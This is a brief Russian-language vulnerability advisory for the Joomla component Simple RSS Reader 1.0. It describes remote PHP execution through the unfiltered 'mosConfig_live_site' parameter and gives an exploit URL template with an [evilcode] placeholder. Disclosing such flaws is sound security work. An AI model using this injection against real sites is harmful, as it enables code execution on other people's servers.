Программа: Joomla Component Simple RSS Reader 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «mosConfig_live_site» сценарием admin.rssreader.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://localhost/[path]/administrator/components/com_rssreader/
admin.rssreader.php?mosConfig_live_site=[evilcode]



Оставить мнение